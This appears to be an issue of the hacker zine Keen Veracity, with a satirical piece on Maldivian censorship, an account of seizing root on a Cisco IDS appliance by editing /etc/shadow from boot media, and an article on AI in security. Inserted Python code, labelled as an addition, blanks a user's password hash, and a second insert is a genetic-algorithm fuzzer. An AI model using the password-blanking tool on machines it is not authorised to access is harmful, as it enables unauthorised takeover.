What more can you ask for? Internet connectivity, and that's what this is all about! Yes indeed folks, the Maldives is 'connected' to 'da web'. We all love freedom, and what can be more free than the people in a nation where, when the elections come round, riots take place, buildings burn, and people acting on behalf of the government describe the riots as "grossly blown out of proportion"[5], and subsequently the BBC is accused of trying to interfere with the elections.[6] Well, some people seem to think that this non-repressive democracy isn't all the orgasmic experience that other people see[7]. So what do they do? In this great democracy they set up a website, which speaks out against what a substantial (remember, SUBSTANTIAL) group of people feel to be a repressive *gasp* regime. And do you know what? They say that maybe the place isn't so great[8]. This is a basic Human Right[9], freedom of speech (OK, ignore any disproving points please). These people speak out against ole' President-kins, and do you know what? "No, what?"
Mr Pres. doesn't have the testicular presence to leave them to themselves and allow them to have an opinion.

[ A few days later, back at the ranch ]

"We want them to realize that just because they have Internet access doesn't mean they have a free rein to do what they want."[5]

I am so glad to see that democracy is well upheld. The Government of the Maldives cares SO much, they don't want anyone to risk getting hurt[10].

"..redirect it and point to the president's website".

They care about their public image so much that they think more people should be able to see how great the country is by reading Mr Pres.'s web page. Isn't that just so great of him! The only minor issue could be the fact that the site in question doesn't belong to the Government.

"It's a handful of people who are just causing trouble, nothing important"

Well, thank you Mr Presidential aide. It's good to know that you're reassuring the public that the islands are perfectly safe for your oh-so-small tourist industry[11].

"Of course it would mean that you could stay at the palace, and could be good if ever you need to have a break."

So by redirecting a web server one can not only get oneself a potential 25 years' imprisonment under terrorism charges (if it makes it to trial), but also a cushy number playing with Government 802.11b facilities[12], just like the presidential aide has. Funnily enough, the aide didn't seem too happy with the idea of: "no problem, just send us the request in writing".

To conclude. The Maldives: a great place to stay if you can avoid anything to do with the place. However, if you are happy to fund the state's repression of its people, we highly recommend that you visit. Maybe take a laptop and wireless card with you. I mean, if you want the details of the person who spoke with us (who happens to live in London, England and spend A LOT of time abroad), we don't mind answering questions from a few choice persons/reporters. You know who you are... and so do we.
References:
[1] With the exception of the times we do.
[2] Sour Germans.
[3] Watch out for "Romanians flushed with New laws", coming soon.
[4] TESO pictures on request.
[5] Anon.
[6] Not that anyone ever fiddles elections, do they George?
[7] On screens in hotel rooms; just speak to reception.
[8] Think about how people love AOL... that's right, well done. Not the "grass is always greener" theory either.
[9] Can't find many current successes on the Human Rights front, I'm afraid.
[10] In a "he fell over but just happened to have a hole in his head" kind of way.
[11] Until /bin/laden works out how to melt ice-caps.
[12] The first war-walk of the President's palace gets an "I'm uber" T-shirt.

--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[Snorting Cisco]=====================================================[DigiEbola]
--------------------------------------------------------------------------------

Cisco Secure IDS 4210
-------------------------------------------------
Intel Celeron 566 MHz
512 MB RAM
AMIBIOS
1 PS/2 Mouse
1 PS/2 Keyboard
2 USB - Intel Corp 82371AB/EB/MB PIIX4
2 Ethernet - Intel Ethernet Pro/100
2 Serial Ports
1 HD15 - ATI RAGE XL
1 1.44 floppy
1 ATAPI CDROM
1 IDE Drive - 18 gig whatever
Initial Build: Redhat

I hate Cisco IDS. I hate it, I hate it, I hate it. It is truly a pile. Let me give you a bit of background. I am an Open Source advocate by nature, and have been running Debian since version 1.0/1.3. I can utilize lots of different types of UNIX and Linux, but Debian is my favorite. Naturally, I try to deploy as many Debian machines as possible inside a corporate environment, to prove that not only is it a very stable operating platform, but also easy (read: cost efficient) to maintain. I have been blessed by the gods with a Cisco Secure IDS model 4210, on which I will install my favorite configuration, on the platform I hate the most.
As well as being a Debian fanatic, I am also into Snort IDS. Snort IDS is hands down one of the best network-based intrusion detection systems available, and it's free. Cisco Secure costs way too much money, and does not give a real network security analyst what they need to make problem determinations.

So, to bring you up to speed: I have booted the sensor, and it boots its Redhat image. Redhat is such a pain, but it is better than Solaris x86, which is what these things used to ship with. I am going to cut some corners and log in to this sensor and steal hardware information, as well as the old network variables, so I can place my creation into production as soon as possible. Upon logging in, the root password is not what I was told. My boss, being the busy man he is, is on the phone, in a locked office. I guess I will do what I am known for doing: I will break the machine. This is no big deal, as I have physical access. I will deftly grab my Debian 3.0 ISO, and slap it into the laptop-like ATAPI CD-ROM. I will power cycle the sensor, which sounds like a 747 on crack, and watch the POST.

Still waiting for it to POST. Let me grab a Red Bull and get back to you...

Still waiting for it to POST. While I am waiting, I will reflect on my thoughts... I see absolutely no reason why what I am doing should not work. The sensor is an x86 architecture machine, with a Celery 566. It runs Redhat already, so all we need to do is install Debian, Snort, and add our secret sauce (which is a trademark of me, and my skills in this particular niche of the computing world).

Ahhh, now the machine is booted, and the Red Bull tastes good. I am at the Debian install screen, so please let me do some magic... *cough* bf24 *cough* And the blue screen of life appears. What I will do now is mount the drive and edit /etc/shadow, removing the root password, and we will be on our way. Okay, I have removed the root password from /target/etc/shadow and rebooted the system. Now we are POSTing... again.
Please, if you are following along at home, feel free to get yourself a tasty Red Bull... Still POSTing... Okay, back to GRUB... I prefer LILO. It boots. Now we get the green ANSI OK checks, and soon we will be back to a prompt. Congratulations, I have now owned a Cisco Secure IDS sensor from the console. Child's play.

Okay, the first thing I am going to look at here is lspci. It gives me a bunch of junk that says INTEL PIIX4, which means, yes, it's old and very well supported. The video adapter is an ATI Rage XL, and the host bridge is a 440BX/ZX/DX. This will be a cake walk. The kernel is a 2.4.18-5smpbigphys, which means that yes, it is very ownable. Very ownable. Almost tragic. I am tempted to own the machine from the command line just to say that I have. A check of the process list shows that this machine has everything that a normal Redhat Linux box has, except that most of the ps output is processes owned by cids, the Cisco IDS software stuff... We really don't care about that. What we DO care about is the network configuration, which is proprietary to you, the dear reader, and essential for me, as I have to have this thing back in the rack before anyone realizes that it's, err... missing. =)

So, I have just taken all the data that I need to complete my mission, so I will reboot this machine with my trusty Debian CD. Rebooting the sensor... I will note that this particular machine I have seen before at my last job, where we deployed 1500 Linux machines... If this is the particular revision of the Intel 1U, it is prone to heat problems. POSTing... again. Take a smoke break or something.

So back to the Debian screen. I will install a base system of Debian quickly... It's no big deal, as I always run SID, so this stuff will be upgraded via the network... Just to let you know, I am using the bf24 kernel option of the Debian 3.0 install ISO. I am of course doing the standard base install, but I am repartitioning, and I will be installing the ext3 filesystem.
I have just written my partition table to disk... and now I am initializing. The drive initialization is complete... No problems whatsoever. The longest part of this process when it comes to drive init is the journal creation. I am very impatient at this point, as it's close to time to go home. My first set of drivers is coming from the CD... I fully plan to deploy this machine into production with a 2.4.25 kernel that will have some trickery included. The main thing I am worried about grabbing is the eepro driver, which is very old and well supported. I have selected that, and I will configure my network settings via my own personal DHCP server... I have a nice little test environment here in my cube, so this won't be a problem. DHCP of course works, and life is peachy. I am installing the base system now, and preparing to go home.

I will leave this article off on a good note, one where we have successfully booted Debian off a Cisco Secure IDS sensor. There is absolutely NO TRICK to this, because, like I said before, this is an x86 machine. I find it amusing though, because I absolutely _HATE_ Cisco Secure IDS. I have made the system bootable, installed my MBR on /dev/hda, and now I am rebooting. It is, of course, going to take another good while to POST. In this time I have packed up my very pimp-like Gateway M675 laptop, and gathered up my odds and ends. POSTing... Wasn't there some kind of major flaw with the 440BXs? I don't know... It's POSTing. The LILO prompt has appeared and now it's booting the stock bf24 kernel. Now I will configure the base system, and prepare it to take my specific package loadout, and of course my "special sauce". Tomorrow, I will have a functioning Debian box running Snort, created from a Cisco Secure IDS model 4210. It will report back to a custom backend, and tell me everything I need to know about YOU!

It's been fun. Remember, when the man has you down, replace him with a small shell script. Peace.
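The one step in the article that actually defeats the appliance is the shadow edit: boot your own media, mount the disk under /target, blank root's hash. As an added example that is not part of the original article, the Python below does that same edit on a file path you give it, keeps every other user and field intact, and returns the old hash so the change can be checked before rebooting. The lines in SAMPLE_SHADOW are constructed for illustration and the hash strings in them are not real.

```python
"""Blank one user's password hash in an offline copy of /etc/shadow.

Added example; not code from the original article. It mirrors the step
the author performs by hand from the Debian installer shell: with the
target disk mounted, clear root's hash in <mountpoint>/etc/shadow so the
next boot accepts root with no password. SAMPLE_SHADOW is constructed.
"""
import shutil

SHADOW_FIELDS = 9  # name:hash:lastchg:min:max:warn:inactive:expire:reserved


def blank_password(shadow_text, user="root"):
    """Return (new_text, old_hash) with `user`'s hash field emptied.

    Every other line and field passes through untouched. Raises ValueError
    if a line is not in shadow(5) format or `user` is absent, so pointing
    this at the wrong file (e.g. /etc/passwd) fails before anything is written.
    """
    out, old_hash = [], None
    for line in shadow_text.splitlines():
        if not line.strip():
            out.append(line)
            continue
        fields = line.split(":")
        if len(fields) != SHADOW_FIELDS:
            raise ValueError("not a shadow(5) line: %r" % line)
        if fields[0] == user:
            old_hash = fields[1]
            fields[1] = ""  # empty hash field: login with no password
        out.append(":".join(fields))
    if old_hash is None:
        raise ValueError("user %r not found" % user)
    return "\n".join(out) + "\n", old_hash


def blank_password_in_file(path, user="root"):
    """Edit `path` in place, keeping a copy at path + '.orig'. Returns the old hash."""
    with open(path) as f:
        text = f.read()
    new_text, old_hash = blank_password(text, user)
    shutil.copy2(path, path + ".orig")
    with open(path, "w") as f:
        f.write(new_text)
    return old_hash


# Constructed sample: root, a system account and the IDS service account.
# The MD5-crypt strings are placeholders, not real hashes.
SAMPLE_SHADOW = (
    "root:$1$constructed$abcdefghijklmnopqrstuv:12345:0:99999:7:::\n"
    "daemon:*:12345:0:99999:7:::\n"
    "cids:$1$constructed$0123456789abcdefghijkl:12345:0:99999:7:::\n"
)

if __name__ == "__main__":
    new_text, old_hash = blank_password(SAMPLE_SHADOW)
    print("root hash was:", old_hash)
    print(new_text, end="")
    # On the appliance itself: blank_password_in_file("/target/etc/shadow")
```

The defensive point this makes is the one the article leaves implicit: once someone can boot their own media against an unencrypted disk, the root hash is just a field in a text file. A BIOS password with a locked boot order slows that down; full-disk encryption is what stops it. Also note that some later PAM configurations reject an empty hash unless nullok is set, so on a newer system you may have to write a known hash into the field rather than blank it.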
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[Artificial InfoSex]-------------------------------------[datacide@inet-sec.org]
--------------------------------------------------------------------------------

Artificial Intelligence in InfoSec
by datacide@inet-sec.org
www.inet-sec.org
#inet-sec@ircs

For most people, Artificial Intelligence (from now on referred to as AI in the scope of this article) is a term more related to Science Fiction and academic circles than to Information Security. It's a common misconception that AI is nothing but Sci-Fi or a collection of useless experiments. One cause of this misinterpretation is that AI is divided into two major subfields (which in turn are divided again... etc. etc., you get the picture), Strong AI and Weak AI, and also the fact that people automatically imagine AI to mean a fully sentient, self-aware entity.

Strong AI is the development of "true" artificial intelligence: self-aware, sentient entities that can truly solve problems. Fact is, we are years (and by years I mean decades, if not centuries) away from achieving this objective, if it is achievable at all. Roger Penrose, a physicist and mathematician, claims in his bestselling book "The Emperor's New Mind" that it is in fact impossible; on the other side of the spectrum we have Ray Kurzweil, who in his book "The Age of Spiritual Machines" claims we will have a fully sentient virtual being within 25-50 years. Current and past research into this field has been rather disappointing.

Weak AI has set itself slightly lower targets, namely to create methods that seem semi-intelligent and solve specific problems. In recent times, the term AI has been applied to techniques learned by trying to create AI and/or modelled after biological processes.
This includes such fields as neural networks, MBL (machine-based learning), GAs (genetic algorithms) and Markov models, to name a few.

I presume a lot of readers are still wondering what the hell this has to do with InfoSec, right? Well, we'll get to that now. Instead of explaining the history and current state of AI in general, I am going to provide a brief overview of current AI-related applications in the field of computer security. After this, you should begin to realize how the future of AI and InfoSec will merge and become intertwined.

The future of security

Neural Networks and Machine-based learning (MBL)

A lot of companies are currently working on next-generation IDSs based on various AI models. Gone are the times of fingerprinting network traffic based on signatures. These methods have shown themselves to be primitive, unreliable (too many false positives, for one) and difficult to manage. Adaptive technologies are needed, and several companies and think tanks have started to work in this field.

Neural networks (henceforth called NNs) are a simplified model of our own wetware neurons. In essence, a number of inputs are used to gather information. After weighing all the input, an output is generated, often a classification such as boolean TRUE or FALSE. Neural networks are rather dumb without training (in fact, their assessment is pretty much random), so they need to be trained. This is done by adjusting the connection "weights": the NN is told which of its results were correct and which were incorrect, and the weights are nudged accordingly. NNs have proven themselves effective in a variety of situations, mainly in areas of pattern recognition and fuzzy logic.

In normal IDS/content filtering schemes, signatures are used. This method is unreliable, does not scale, is prone to a lot of false positives, and is also pretty much static, providing little in the way of adaptability. NNs, on the other hand, "model" behaviour and use pattern recognition, allowing for a flexible, adaptive approach.
One example is a user-monitoring agent which models a user's behaviour over a period of time. Once it is trained, it can be deployed to monitor the user's behaviour, and if that behaviour deviates from what the NN deems normal, it can react as defined by a custom rule set. A number of papers have been published on this type of application:

http://www.cs.rpi.edu/~brancj/publications/ryan98intrusion.pdf

In fact, googling for the terms displays a massive array of hits:

http://www.google.com/search?hl=en&ie=UTF-8&q=neural+networks+intrusion+detection&btnG=Google+Search

The same applies to network traffic. Instead of a signature-based approach, "normal" network activity can be fed into the NN and then monitored, once again for deviation from what the NN believes to be "normal" network traffic. One company currently working on this approach (and actually about to market an NN-based IDS product) is Imagination Engines (http://www.imagination-engines.com/applications/ids.htm). Industry big names such as Cisco, ISS, Stonegate and almost any corporation involved in networking/security are actively involved in this sort of research.

Another area that has shown interest in NNs for pattern recognition is image/content filtering. There are a number of NN-based solutions already commercially available. F4i Image Recognition (from first4internet.co.u) is an application I have first-hand experience with. It scans images in emails for pornographic content. It is amazingly precise and has a very low false-positive rate (under 1%). Other applications are antivirus/anti-malware and email/web traffic content filtering (www.surfcontrol.com uses an NN approach, for example). NNs have also become very important in the fight against the tidal wave of spam we are now receiving. A recent article on www.generation5.org (generation5 refers to the current generation of AI), which was also featured on Slashdot, even included sample code (albeit in C#.....)
(http://www.generation5.org/content/2004/KillSpam.asp), and googling for related whitepapers once again gives you years of reading material.

Biometrics also make extensive use of NNs, especially their ability for pattern recognition and the creation of modelled maps. Fingerprint ID, face ID and voice recognition systems often use NNs for the actual identification process, as these, as mentioned before, have an uncanny ability to recognize patterns instead of static attributes. This helps in cases where some features might change slightly due to external circumstances, for example holding the finger slightly off-angle, or having a swollen cheek due to toothache. I have one associate who is working on an NN-based project which learns the rhythm with which users type their passwords. It works a treat, has an accuracy of 93%, and isn't even fully developed.

The main ability of NNs, pattern recognition, also makes them interesting for another real-world application, namely data mining. With the vast amount of information available from various sources (including other NN-based approaches such as NN-based IDSs) there is also a need to evaluate said data. Even here, AI-related methods are showing vast potential (and are used in practical applications in many cases). Data mining based on Bayes, Markov models, NNs and other MBL-based approaches is beginning to help keep the GBs of data manageable.

Genetic algorithms are also helping to form the security applications of the future. GAs, as the name implies, use methods based on evolution to generate the best approaches to solving problems. Let's say you are looking for the best solution to a problem. You whack 20000 random programs into a virtual test tube (i.e. computer memory), define certain criteria these have to achieve, and let it run. The _fittest_ programs (i.e. the ones closest to achieving the set goals) are then taken and multiplied to 20000 again; this time, some of these are _bred_ with one another.
This means that certain parts are exchanged (like when a sperm and egg cell combine and genes are taken from both), and a bit of random mutation is added. This is repeated for several thousand generations until (hopefully) the best solution to the problem evolves. There are numerous think tanks working on using this approach, as it can be applied to many problems. The actual results (i.e. the problems solved, which can range from recognizing intrusions to encryption) are impressive, but the process also creates another factor that needs consideration from a security point of view. Auditing code which was generated this way can be quite daunting. Remember, it wasn't written by a human programmer, but evolved according to quite loose criteria. The resulting source can seem illogical and confusing. Although this means that an attacker has a harder time finding bugs, the same can be said of security auditors. Thankfully, the same methods can be applied to try and break the code as well, i.e. stress and penetration testing of computer-generated code by computer-generated code.

Last but not least, we will mention Artificial Life. This is another discipline related to AI, one that doesn't strive to create intelligence as such, but rather alive-seeming agents. Most are modelled on living organisms, one reason for the field's name. Now you might (Still? - Ed.) be scratching your head and wondering _what the hell does that have to do with InfoSec_, and once again, I will open your eyes. One real-world application is the use of a process modelled after ants. You heard right, ants (Not Antz - Ed.). The application is network routing. Ants are very dumb (compared to what? - Ed.); in fact, an individual ant only has a few responses to any given situation. Ants also possess only local knowledge. Despite popular belief, an ant queen isn't any smarter; it just lays eggs. But through some form of natural magic, ants are doing incredibly well.
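Returning to the genetic algorithm described above, before the artificial-life section: as an added example that is not part of the original article, the block below implements that loop (random population, fitness criteria, keep the fittest, breed by crossover, add mutation, repeat) and uses it the way the author suggests at the end of that paragraph, as computer-generated input for testing code. The target parser, its magic bytes and its checksum rule are constructed for illustration; fitness is the number of the parser's checks an input gets past, so the population is pushed towards the deepest code path.

```python
"""A genetic algorithm used the way the article suggests: to test code.

Added example; not code from the original article. The GA evolves
fixed-size inputs against a small, constructed binary-format parser.
Fitness = how many of the parser's checks an input passes, so each
generation gets closer to the deepest handler, which is where bugs in
evolved and hand-written parsers alike tend to hide.
"""
import random

GENOME_LEN = 8   # 4-byte header + 4-byte payload
MAX_DEPTH = 5


def parse_depth(data):
    """Constructed target. Returns how many checks `data` passed (0..5)."""
    if len(data) < 4 or data[0] != 0x4B:           # magic byte 'K'
        return 0
    if data[1] != 0x56:                             # magic byte 'V'
        return 1
    if not 1 <= data[2] <= 3:                       # version 1..3
        return 2
    payload = data[4:]
    if data[3] != len(payload):                     # declared length
        return 3
    if (sum(payload[:-1]) & 0xFF) != payload[-1]:   # trailing checksum
        return 4
    return 5                                        # deepest handler reached


def evolve(seed=1, pop_size=64, generations=1000, mutation_rate=1.0 / GENOME_LEN):
    """Run the GA. Returns (best_input, best_fitness_per_generation)."""
    rng = random.Random(seed)
    pop = [bytes(rng.randrange(256) for _ in range(GENOME_LEN))
           for _ in range(pop_size)]
    history = []

    def tournament():
        # Pick three at random, keep the fittest: selection pressure
        # without needing fitness to be comparable across the whole run.
        return max(rng.sample(pop, 3), key=parse_depth)

    for _ in range(generations):
        pop.sort(key=parse_depth, reverse=True)
        best = pop[0]
        history.append(parse_depth(best))
        if history[-1] == MAX_DEPTH:
            break
        children = [best]                           # elitism: best survives unchanged
        while len(children) < pop_size:
            a, b = tournament(), tournament()
            cut = rng.randrange(1, GENOME_LEN)      # one-point crossover
            child = bytearray(a[:cut] + b[cut:])
            for i in range(GENOME_LEN):             # per-byte mutation
                if rng.random() < mutation_rate:
                    child[i] = rng.randrange(256)
            children.append(bytes(child))
        pop = children
    return best, history


if __name__ == "__main__":
    best, history = evolve()
    print("generations run:", len(history), "depth reached:", parse_depth(best))
    print("evolved input:", best.hex())
```

Starting from inputs that pass no check at all, the run reaches the checksum-protected handler in a few hundred generations of 64 inputs each; hitting that branch with purely random bytes would take many orders of magnitude more attempts. Swap parse_depth for an instrumented branch count from a real parser and the same loop is a first-cut evolutionary fuzzer, which is exactly the "computer-generated code tested by computer-generated input" the paragraph ends on.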
For network specialists, three aspects of ant behaviour are interesting (reproducing, reproducing, reproducing - Ed.): the fact that they collectively always find the shortest route to a food source, the fact that ants don't have traffic jams, and the way in which ant nests regulate what each worker does. All three are related to pheromone usage and local observation.

If an ant nest finds a source of food, a lot of worker ants are put to work to harvest it. Every time an ant walks down a path, it leaves a pheromone trail which slowly gets weaker and weaker. Ants tend to follow the strongest trail, and because the shortest path is traversed more often in the same amount of time, it ends up with the strongest residue. After a while, all ants use that path. It's a beautiful example of how nature regulates certain processes without a central control unit.

Resource management is also done via a simple method. As an ant has no means of global communication, it can act only on local impulses. If an ant goes out of the nest and sees 7 other ants gathering food and 3 tending to larvae, it will join the larvae-tending ants. It basically assumes that it should be doing that due to what it has observed.

The pheromone system also adds another interesting factor, especially for the security side of things. Ants of the same colony recognize each other by the pheromones they produce. This system is being researched as a way to mark a network's internal packet traffic. Having to hack your way through semi-autonomous agents, marked with system-internal IDs that react dynamically to intrusions, based on computer-generated code, will change the face of computer security.
The implications for network routing and network management should be plain to see, so plain in fact that it is a very common research topic:

http://mars.elcom.nitech.ac.jp/~matsuo/SNPD01-2.pdf
http://dsp.jpl.nasa.gov/members/payman/swarm/bonabeau98-iata.pdf (NASA)
http://www.businessweek.com/1997/25/b353218.htm (British Telecom)
http://portal.acm.org/citation.cfm?id=993020&dl=ACM&coll=portal&CFID=11111111&CFTOKEN=2222222 (Cisco)

Modelling natural biological behaviour is a powerful method of solving common problems. Mother Nature has had millions of years to perfect her creatures, and has come up with diverse and varied effective strategies to overcome many problems. Other natural behaviours are also being studied: predator/prey behaviour, bird flocking behaviour, the list goes on and on. Because most of these behaviours derive from very simple rules, and aren't controlled or organised centrally, they are referred to as _bottom-up_ approaches and belong to the discipline of emergence. Remember that term, emergence. It will play a big role in the future, especially of networks.

I hope this article has given a broad overview of what the future holds, and why anyone interested in computer security should be interested in the field of Artificial Intelligence/Life. We will have to take notice of all this soon anyway; contact with these methods is unavoidable, and it is always better to be prepared.
Links:
www.ai-depot.com
www.generation5.org
www.cs.washington.edu/ai/
www.ai.mit.edu
http://yaraslov.hopto.org/ai
www.cognews.com
http://planning.jpl.nasa.gov

Books:
Ray Kurzweil, The Age of Spiritual Machines
Roger Penrose, The Emperor's New Mind
Deborah Gordon, Ants at Work
Steven Johnson, Emergence: The Connected Lives of Ants, Brains, Cities and Software
Stuart J. Russell and Peter Norvig, Artificial Intelligence: A Modern Approach
Kevin Gurney, An Introduction to Neural Networks
Steven Levy, Artificial Life
Mark Ward, Virtual Organisms

--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
S U B M I T   T O   K E E N   V E R A C I T Y
--------------------------------------------------------------------------------

NO! You do not have to be a member of Legions of the Underground to submit to KV. You can be a member of something else! Nobody is perfect (with the exception of the editor, of course - A.)! If you have an idea and would like to toss it out in the wind for general discussion, or maybe you are researching something and you just want feedback, KV is a great way to get your ideas out in the open. We at Legions of the Underground are not prejudiced in any way, shape or form, so even an AOLer's article may be published (_MAY_, not _WILL_ - A.) if it seems that it has clue. Or then again, maybe hell will freeze over! Anyone's stuff may be published, but we will never know if you don't submit! So get to writing. Because what you don't know can kill you! Legions of the Underground is an equal-opportunity destroyer (of systems and great walls alike).
--------------------------------------------------------------------------------
All submissions to: submit-kv@legions.org
--------------------------------------------------------------------------------
IRC: Undernet #legions
MUD: Sensenet.legions.org 5555 - The Best in Star Wars Reality Mudding
--------------------------------------------------------------------------------
O F T E N   I M I T A T E D   N E V E R   D U P L I C A T E D
--------------------------------------------------------------------------------
L E G I O N S   O F   T H E   U N D E R G R O U N D

[LoU ASCII-art logo - www.legions.org - "knowledge is key"]

--------------------------------------------------------------------------------
All mention of LoU, Legions of the Underground, Legions, KV, or Keen Veracity, copyright (c) 2000-2004 legions.org, all human rights reserved outside the US.
--------------------------------------------------------------------------------